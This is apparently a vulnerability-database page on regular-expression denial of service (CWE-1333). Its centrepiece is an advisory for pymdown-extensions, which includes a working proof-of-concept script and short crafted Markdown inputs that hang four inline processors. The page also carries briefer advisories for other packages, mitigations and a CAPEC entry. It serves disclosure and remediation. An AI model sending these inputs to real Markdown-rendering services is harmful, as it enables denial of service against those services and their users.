f"malicious line stalls the renderer; a valid {len(base_txt)}-byte line is instant.")
assert all(repro), "not reproduced"
print("\nVERDICT: exponential ReDoS reproduced in all four extensions via the "
"public markdown.markdown() API, default config (each < 50-byte input).")
Run:
uv run --with pymdown-extensions==11.0 --with markdown==3.10.2 python poc.py
The bug is in pymdown-extensions' own regexes run by the stdlib re engine, so it
is independent of the Markdown library version (markdown pinned only for
byte-exact output). Observed output:
# pymdown-extensions 11.0 / markdown 3.10.2
[pymdownx.caret] benign baseline (len 46, valid+closed): 11.768 ms
malicious len 27: 0.003 s
malicious len 33: 0.054 s (x16.6)
malicious len 39: 0.946 s (x17.6)
malicious len 47: > 5 s (HANG)
=> REPRODUCED: a 47-byte malicious line stalls the renderer; a valid 46-byte line is instant.
[pymdownx.tilde] benign baseline (len 46, valid+closed): 5.364 ms
malicious len 27: 0.003 s
malicious len 33: 0.053 s (x17.1)
malicious len 39: 0.962 s (x18.2)
malicious len 47: > 5 s (HANG)
=> REPRODUCED: a 47-byte malicious line stalls the renderer; a valid 46-byte line is instant.
[pymdownx.betterem] benign baseline (len 46, valid+closed): 3.167 ms
malicious len 27: 0.003 s
malicious len 33: 0.052 s (x17.1)
malicious len 39: 0.948 s (x18.1)
malicious len 47: > 5 s (HANG)
=> REPRODUCED: a 47-byte malicious line stalls the renderer; a valid 46-byte line is instant.
[pymdownx.magiclink] benign baseline (len 52, valid+closed): 4.935 ms
malicious len 37: 0.033 s
malicious len 41: 0.210 s (x6.4)
malicious len 45: 1.405 s (x6.7)
malicious len 49: > 5 s (HANG)
=> REPRODUCED: a 49-byte malicious line stalls the renderer; a valid 52-byte line is instant.
VERDICT: exponential ReDoS reproduced in all four extensions via the public markdown.markdown() API, default config (each < 50-byte input).
The per-step ratio stays roughly constant as the run grows (a fixed multiplicative factor per fixed-size increment) — the signature of exponential, not polynomial, backtracking. A valid, closed delimiter run of the same length exercises the same regex yet renders in well under a millisecond, isolating the cost to the unclosed crafted run. Extending it a few more characters pushes the render time into minutes and beyond.
Impact
Denial of service: a sub-50-byte line pins the rendering thread at 100% CPU, with no memory pressure to trip an OOM killer. Most Material/MkDocs usage renders trusted author content at build time, but the untrusted-input exposure is concrete in two settings:
- General Python web apps that render user-supplied Markdown (comments, wikis,
issue/ticket bodies, chat, live preview) — notably any app using
pymdownx.extra, which bundlesbetteremwith the vulnerable defaultsmart_enable='underscore', or that reuses a Material-style extension block in a runtime renderer. -
Hosted docs/CI systems that build untrusted, user-contributed Markdown, where a single crafted line hangs the shared build worker.
-
Attacker: unauthenticated, remote (anyone who can submit Markdown).
- Configuration: default for each extension.
- Proposed CWE-1333. Proposed CVSS 3.1 (as proposed — the maintainer makes
the final call):
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H(7.5, High).
Suggestion
The vulnerable content groups need to be rewritten so a delimiter run has exactly
one parse, removing the {2,} partition ambiguity that lets the engine
re-segment a run on backtracking. For the emphasis patterns, restructuring the
content so a delimiter run is consumed in a single, non-re-partitionable way
(rather than by a {2,} branch inside a +? group) removes the blow-up; for
RE_LINK, disambiguate the host so . is matched in exactly one place (a single
labelled-host pattern such as (?:[-\w]+)(?:\.[-\w]+)*) rather than by
overlapping classes. Possessive quantifiers / atomic groups are the most direct
tool but require Python 3.11+; since the project supports Python 3.10, a
structural rewrite is the portable option.
A regression fixture per extension (a short delimiter run with no valid closer, asserted to render under a small time budget) would guard against reintroduction.
References
- Affected source (
pymdown-extensions 11.0):pymdownx/caret.py:56(SUP2),pymdownx/tilde.py:55(SUB2),pymdownx/betterem.py:93(SMART_UNDER_EM2, default;:69UNDER_EM2shares the shape),pymdownx/magiclink.py:56(RE_LINK, host subexpression at:59). - Novelty: same class as CVE-2025-68142 (
pymdownx.blocks.captionRE_FIG_NUM, fixed 10.16.1) but distinct extensions, regexes, and root cause. Thecaret/tilde/betteremcontent groups gained the vulnerable{2,}alternation in PR #2547 (v10.13); earlier releases used a linear(.+?)/([^\s]+?)group.magiclink's host pattern is long-standing. None of the four has been touched by a prior security fix; all are present in the latest release (11.0).
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 11.0.0"
},
"package": {
"ecosystem": "PyPI",
"name": "pymdown-extensions"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "11.0.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-67422"
],
"database_specific": {
"cwe_ids": [
"CWE-1333"
],
"github_reviewed": true,
"github_reviewed_at": "2026-08-07T18:26:07Z",
"nvd_published_at": "2026-08-06T22:18:21Z",
"severity": "HIGH"
},
"details": "### Summary\n\nFour inline processors in pymdown-extensions contain regular expressions with\nexponential backtracking. A single untrusted Markdown line under\n50 bytes drives `markdown.markdown()` into unbounded CPU on the rendering thread\n(seconds at ~45 bytes, growing exponentially with each added character). All four\nfire in the extension\u0027s **default configuration**\nand are reachable through the documented public API. The `caret`/`tilde`/\n`betterem` blow-up was introduced by the emphasis-pattern rewrite in PR #2547\n(first released in **10.13**, Dec 2024) \u2014 earlier releases used a linear\n`(.+?)` / `([^\\s]+?)` content group \u2014 and is present through **11.0** (latest);\n`magiclink`\u0027s host pattern is long-standing and affects effectively all releases.\nLikely **CWE-1333 (Inefficient Regular Expression Complexity)**.\n\nThis is a distinct issue from CVE-2025-68142 (ReDoS in `pymdownx.blocks.caption`,\n`RE_FIG_NUM`, fixed in 10.16.1): different extensions, different regexes, and a\ndifferent root cause (delimiter-run partition ambiguity rather than a `.`/`\\.`\ntypo).\n\n### Details\n\nFour regexes share, or closely mirror, a vulnerable shape \u2014 an inner group that\ncan partition a run of the delimiter character into `{2,}`-sized pieces in\nexponentially many ways, wrapped in a lazy `+?` that must fail before the engine\ncan give up:\n\n| Extension | Regex | Location (`11.0`) |\n|---|---|---|\n| `pymdownx.caret` (superscript `^\u2026^`) | `SUP2` | `pymdownx/caret.py:56` |\n| `pymdownx.tilde` (subscript `~\u2026~`) | `SUB2` | `pymdownx/tilde.py:55` |\n| `pymdownx.betterem` (underscore `_\u2026_`) | `SMART_UNDER_EM2` (default) | `pymdownx/betterem.py:93` |\n| `pymdownx.magiclink` (bare-URL autolink) | `RE_LINK` | `pymdownx/magiclink.py:56` (host at `:59`) |\n\n`pymdownx/caret.py:56` (`pymdown-extensions 11.0`):\n\n```python\nSUP2 = r\u0027(?\u003c!\\^)(\\^)(?![\\^\\s])((?:[^\\^\\s]|\\^{2,})+?)(?\u003c![\\^\\s])(\\^)(?!\\^)\u0027\n```\n\nThe content group `(?:[^\\^\\s]|\\^{2,})+?` matches a run of carets only via the\n`\\^{2,}` branch. A run of *k* carets can be split into \u22652-length pieces in\nexponentially many combinations; when no caret can serve as a valid closing\ndelimiter (the trailing `(?\u003c![\\^\\s])(\\^)` cannot be satisfied), the engine\nexplores every partition before failing. `SUB2` (tilde) and `SMART_UNDER_EM2`\n(betterem) are the same construct for `~` and `_`. In `betterem` the default\n`smart_enable=\u0027underscore\u0027` routes underscores to `SmartUnderscoreProcessor` \u2192\n`SMART_UNDER_EM2` (`betterem.py:93`), which is the default-reachable,\nAPI-exploitable pattern; the non-smart `UNDER_EM2` (`:69`, used only when\n`smart_enable` is `asterisk`/`disable`) shares the shape but did not reproduce\nthrough the public `markdown.markdown()` pipeline on the tested payload, so a fix\nand regression test should target `SMART_UNDER_EM2`.\n\n`pymdownx/magiclink.py:59` has the analogous ambiguity in the host portion, where\noverlapping character classes let a run of dots be grouped exponentially:\n\n```python\n(?:ht|f)tps?://[^_\\W][-\\w]*(?:\\.[-\\w.]+)* # host: \u0027\\.\u0027 and \u0027[-\\w.]\u0027 inside (?:...)* both match \u0027.\u0027\n```\n\n`SUP2`/`SUB2`/`SMART_UNDER_EM2` are applied at each delimiter occurrence via the\ndefault `PatternSequenceProcessor` subclasses (`pymdownx/util.py`); `RE_LINK` is\napplied by `MagiclinkPattern` (registered unconditionally at priority 85). In all\nfour cases, rendering `markdown.markdown(src, extensions=[ext])` on untrusted\n`src` in default configuration is sufficient to reach the regex.\n\n### PoC\n\nSingle self-contained script; runs against the pinned release in an ephemeral\nenv. Non-destructive \u2014 the input is ordinary Markdown text; the impact is CPU/time\n(a per-render alarm caps each attempt so the script terminates).\n\n```python\nimport signal\nimport time\nfrom importlib.metadata import version\n\nimport markdown\n\nprint(f\"# pymdown-extensions {version(\u0027pymdown-extensions\u0027)} / markdown {version(\u0027markdown\u0027)}\")\n\nCAP = 5.0 # a single render exceeding this is treated as a hang\n\n\nclass Timeout(Exception):\n pass\n\n\ndef render(ext, text):\n signal.signal(signal.SIGALRM, lambda *_: (_ for _ in ()).throw(Timeout()))\n signal.setitimer(signal.ITIMER_REAL, CAP)\n t = time.perf_counter()\n try:\n markdown.markdown(text, extensions=[ext])\n return time.perf_counter() - t\n except Timeout:\n return None\n finally:\n signal.setitimer(signal.ITIMER_REAL, 0)\n\n\n# ext -\u003e (malicious builder, benign builder [valid \u0026 closed], ramp, hang count)\nCASES = {\n \"pymdownx.caret\": (lambda n: \"^a\" + \"^\" * n + \"b\", lambda n: \"^\" + \"a\" * n + \"^\", [24, 30, 36], 44),\n \"pymdownx.tilde\": (lambda n: \"~a\" + \"~\" * n + \"b\", lambda n: \"~\" + \"a\" * n + \"~\", [24, 30, 36], 44),\n \"pymdownx.betterem\": (lambda n: \"_a\" + \"_\" * n + \"b\", lambda n: \"_\" + \"a\" * n + \"_\", [24, 30, 36], 44),\n \"pymdownx.magiclink\": (lambda n: \"http://a\" + \".\" * n + \" \", lambda n: \"http://\" + \"a\" * n + \".com \", [28, 32, 36], 40),\n}\n\nrepro = []\nfor ext, (evil, benign, ramp, hang) in CASES.items():\n base_txt = benign(hang) # valid, closed run: same regex machinery, but linear\n base = render(ext, base_txt)\n print(f\"\\n[{ext}] benign baseline (len {len(base_txt)}, valid+closed): {base * 1e3:.3f} ms\")\n prev = None\n for n in ramp:\n txt = evil(n)\n dt = render(ext, txt)\n ratio = f\" (x{dt / prev:.1f})\" if (prev and dt) else \"\"\n shown = f\"{dt:8.3f} s\" if dt is not None else f\"\u003e {CAP:.0f} s (HANG)\"\n print(f\" malicious len {len(txt):3d}: {shown}{ratio}\")\n prev = dt\n txt = evil(hang)\n dt = render(ext, txt)\n hung = dt is None\n print(f\" malicious len {len(txt):3d}: \"\n f\"{\u0027\u003e %.0f s (HANG)\u0027 % CAP if hung else \u0027%.3f s\u0027 % dt}\")\n ok = base \u003c 0.05 and (hung or dt \u003e 1.0)\n repro.append(ok)\n print(f\" =\u003e {\u0027REPRODUCED\u0027 if ok else \u0027not reproduced\u0027}: a {len(txt)}-byte \"\n f\"malicious line stalls the renderer; a valid {len(base_txt)}-byte line is instant.\")\n\nassert all(repro), \"not reproduced\"\nprint(\"\\nVERDICT: exponential ReDoS reproduced in all four extensions via the \"\n \"public markdown.markdown() API, default config (each \u003c 50-byte input).\")\n```\n\nRun:\n\n```bash\nuv run --with pymdown-extensions==11.0 --with markdown==3.10.2 python poc.py\n```\n\nThe bug is in pymdown-extensions\u0027 own regexes run by the stdlib `re` engine, so it\nis independent of the Markdown library version (`markdown` pinned only for\nbyte-exact output). Observed output:\n\n```\n# pymdown-extensions 11.0 / markdown 3.10.2\n\n[pymdownx.caret] benign baseline (len 46, valid+closed): 11.768 ms\n malicious len 27: 0.003 s\n malicious len 33: 0.054 s (x16.6)\n malicious len 39: 0.946 s (x17.6)\n malicious len 47: \u003e 5 s (HANG)\n =\u003e REPRODUCED: a 47-byte malicious line stalls the renderer; a valid 46-byte line is instant.\n\n[pymdownx.tilde] benign baseline (len 46, valid+closed): 5.364 ms\n malicious len 27: 0.003 s\n malicious len 33: 0.053 s (x17.1)\n malicious len 39: 0.962 s (x18.2)\n malicious len 47: \u003e 5 s (HANG)\n =\u003e REPRODUCED: a 47-byte malicious line stalls the renderer; a valid 46-byte line is instant.\n\n[pymdownx.betterem] benign baseline (len 46, valid+closed): 3.167 ms\n malicious len 27: 0.003 s\n malicious len 33: 0.052 s (x17.1)\n malicious len 39: 0.948 s (x18.1)\n malicious len 47: \u003e 5 s (HANG)\n =\u003e REPRODUCED: a 47-byte malicious line stalls the renderer; a valid 46-byte line is instant.\n\n[pymdownx.magiclink] benign baseline (len 52, valid+closed): 4.935 ms\n malicious len 37: 0.033 s\n malicious len 41: 0.210 s (x6.4)\n malicious len 45: 1.405 s (x6.7)\n malicious len 49: \u003e 5 s (HANG)\n =\u003e REPRODUCED: a 49-byte malicious line stalls the renderer; a valid 52-byte line is instant.\n\nVERDICT: exponential ReDoS reproduced in all four extensions via the public markdown.markdown() API, default config (each \u003c 50-byte input).\n```\n\nThe per-step ratio stays roughly constant as the run grows (a fixed multiplicative\nfactor per fixed-size increment) \u2014 the signature of exponential, not polynomial,\nbacktracking. A valid, closed delimiter run of the same length exercises the same\nregex yet renders in well under a millisecond, isolating the cost to the *unclosed*\ncrafted run. Extending it a few more characters pushes the render time into minutes\nand beyond.\n\n### Impact\n\nDenial of service: a sub-50-byte line pins the rendering thread at 100% CPU, with\nno memory pressure to trip an OOM killer. Most Material/MkDocs usage renders\ntrusted author content at build time, but the untrusted-input exposure is concrete\nin two settings:\n\n- General Python web apps that render user-supplied Markdown (comments, wikis,\n issue/ticket bodies, chat, live preview) \u2014 notably any app using\n `pymdownx.extra`, which bundles `betterem` with the vulnerable default\n `smart_enable=\u0027underscore\u0027`, or that reuses a Material-style extension block in\n a runtime renderer.\n- Hosted docs/CI systems that build untrusted, user-contributed Markdown, where a\n single crafted line hangs the shared build worker.\n\n- Attacker: unauthenticated, remote (anyone who can submit Markdown).\n- Configuration: **default** for each extension.\n- Proposed **CWE-1333**. Proposed CVSS 3.1 (as proposed \u2014 the maintainer makes\n the final call): `AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H` (7.5, High).\n\n### Suggestion\n\nThe vulnerable content groups need to be rewritten so a delimiter run has exactly\none parse, removing the `{2,}` partition ambiguity that lets the engine\nre-segment a run on backtracking. For the emphasis patterns, restructuring the\ncontent so a delimiter run is consumed in a single, non-re-partitionable way\n(rather than by a `{2,}` branch inside a `+?` group) removes the blow-up; for\n`RE_LINK`, disambiguate the host so `.` is matched in exactly one place (a single\nlabelled-host pattern such as `(?:[-\\w]+)(?:\\.[-\\w]+)*`) rather than by\noverlapping classes. Possessive quantifiers / atomic groups are the most direct\ntool but require Python 3.11+; since the project supports Python 3.10, a\nstructural rewrite is the portable option.\n\nA regression fixture per extension (a short delimiter run with no valid closer,\nasserted to render under a small time budget) would guard against reintroduction.\n\n### References\n\n- Affected source (`pymdown-extensions 11.0`): `pymdownx/caret.py:56` (`SUP2`),\n `pymdownx/tilde.py:55` (`SUB2`), `pymdownx/betterem.py:93` (`SMART_UNDER_EM2`,\n default; `:69` `UNDER_EM2` shares the shape), `pymdownx/magiclink.py:56`\n (`RE_LINK`, host subexpression at `:59`).\n- Novelty: same class as CVE-2025-68142 (`pymdownx.blocks.caption` `RE_FIG_NUM`,\n fixed 10.16.1) but distinct extensions, regexes, and root cause. The\n `caret`/`tilde`/`betterem` content groups gained the vulnerable `{2,}`\n alternation in PR #2547 (v10.13); earlier releases used a linear\n `(.+?)` / `([^\\s]+?)` group. `magiclink`\u0027s host pattern is long-standing. None\n of the four has been touched by a prior security fix; all are present in the\n latest release (11.0).",
"id": "GHSA-gm37-52c6-37mw",
"modified": "2026-08-07T18:26:07Z",
"published": "2026-08-07T18:26:07Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/facelessuser/pymdown-extensions/security/advisories/GHSA-gm37-52c6-37mw"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-67422"
},
{
"type": "WEB",
"url": "https://github.com/facelessuser/pymdown-extensions/commit/c68498598d7b13011bb4571350b6e3612a4ce44b"
},
{
"type": "PACKAGE",
"url": "https://github.com/facelessuser/pymdown-extensions"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "pymdown-extensions: exponential-backtracking ReDoS in caret, tilde, betterem, and magiclink inline processors"
}
GHSA-GPVJ-GP8C-C7P2
Vulnerability from github – Published: 2023-02-12 15:30 – Updated: 2026-02-03 17:53A vulnerability has been found in simple-markdown 0.5.1 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file simple-markdown.js. The manipulation leads to inefficient regular expression complexity. The attack can be launched remotely. Upgrading to version 0.5.2 is able to address this issue. The name of the patch is 89797fef9abb4cab2fb76a335968266a92588816. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220639.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "simple-markdown"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.5.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2019-25103"
],
"database_specific": {
"cwe_ids": [
"CWE-1333"
],
"github_reviewed": true,
"github_reviewed_at": "2023-02-14T01:02:08Z",
"nvd_published_at": "2023-02-12T15:15:00Z",
"severity": "HIGH"
},
"details": "A vulnerability has been found in simple-markdown 0.5.1 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file simple-markdown.js. The manipulation leads to inefficient regular expression complexity. The attack can be launched remotely. Upgrading to version 0.5.2 is able to address this issue. The name of the patch is 89797fef9abb4cab2fb76a335968266a92588816. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220639.",
"id": "GHSA-gpvj-gp8c-c7p2",
"modified": "2026-02-03T17:53:00Z",
"published": "2023-02-12T15:30:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25103"
},
{
"type": "WEB",
"url": "https://github.com/Khan/simple-markdown/issues/71"
},
{
"type": "WEB",
"url": "https://github.com/ariabuckles/simple-markdown/commit/89797fef9abb4cab2fb76a335968266a92588816"
},
{
"type": "PACKAGE",
"url": "https://github.com/ariabuckles/simple-markdown"
},
{
"type": "WEB",
"url": "https://github.com/ariabuckles/simple-markdown/releases/tag/0.5.2"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JS-SIMPLEMARKDOWN-460540"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.220639"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.220639"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Regular Expression Denial of Service in simple-markdown"
}
GHSA-GQV6-F424-3G7H
Vulnerability from github – Published: 2024-02-16 09:30 – Updated: 2024-08-23 00:31An issue in alanclarke URLite v.3.1.0 allows an attacker to cause a denial of service (DoS) via a crafted payload to the parsing function.
{
"affected": [],
"aliases": [
"CVE-2023-51931"
],
"database_specific": {
"cwe_ids": [
"CWE-1333",
"CWE-20"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-02-16T09:15:08Z",
"severity": "HIGH"
},
"details": "An issue in alanclarke URLite v.3.1.0 allows an attacker to cause a denial of service (DoS) via a crafted payload to the parsing function.",
"id": "GHSA-gqv6-f424-3g7h",
"modified": "2024-08-23T00:31:37Z",
"published": "2024-02-16T09:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51931"
},
{
"type": "WEB",
"url": "https://github.com/alanclarke/urlite/issues/61"
},
{
"type": "WEB",
"url": "https://gist.github.com/6en6ar/c792d8337b63f095cbda907e834cb4ba"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-GWRP-82JW-P87Q
Vulnerability from github – Published: 2024-04-30 15:30 – Updated: 2024-07-03 18:37An issue in OpenStack Storlets yoga-eom allows a remote attacker to execute arbitrary code via the gateway.py component.
{
"affected": [],
"aliases": [
"CVE-2024-28716"
],
"database_specific": {
"cwe_ids": [
"CWE-1333"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-04-30T15:15:52Z",
"severity": "HIGH"
},
"details": "An issue in OpenStack Storlets yoga-eom allows a remote attacker to execute arbitrary code via the gateway.py component.",
"id": "GHSA-gwrp-82jw-p87q",
"modified": "2024-07-03T18:37:40Z",
"published": "2024-04-30T15:30:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28716"
},
{
"type": "WEB",
"url": "https://bugs.launchpad.net/solum/+bug/2047505"
},
{
"type": "WEB",
"url": "https://drive.google.com/file/d/11x-6CjWCyap8_W1JpVzun56HQkPNLtWT/view?usp=drive_link"
},
{
"type": "WEB",
"url": "https://gist.github.com/Fewword/f098d8d6375ac25e27b18c0e57be532f"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
Use regular expressions that do not support backtracking, e.g. by removing nested quantifiers.
Mitigation
Set backtracking limits in the configuration of the regular expression implementation, such as PHP's pcre.backtrack_limit. Also consider limits on execution time for the process.
Mitigation
Do not use regular expressions with untrusted input. If regular expressions must be used, avoid using backtracking in the expression.
Mitigation
Limit the length of the input that the regular expression will process.
CAPEC-492: Regular Expression Exponential Blowup
An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions.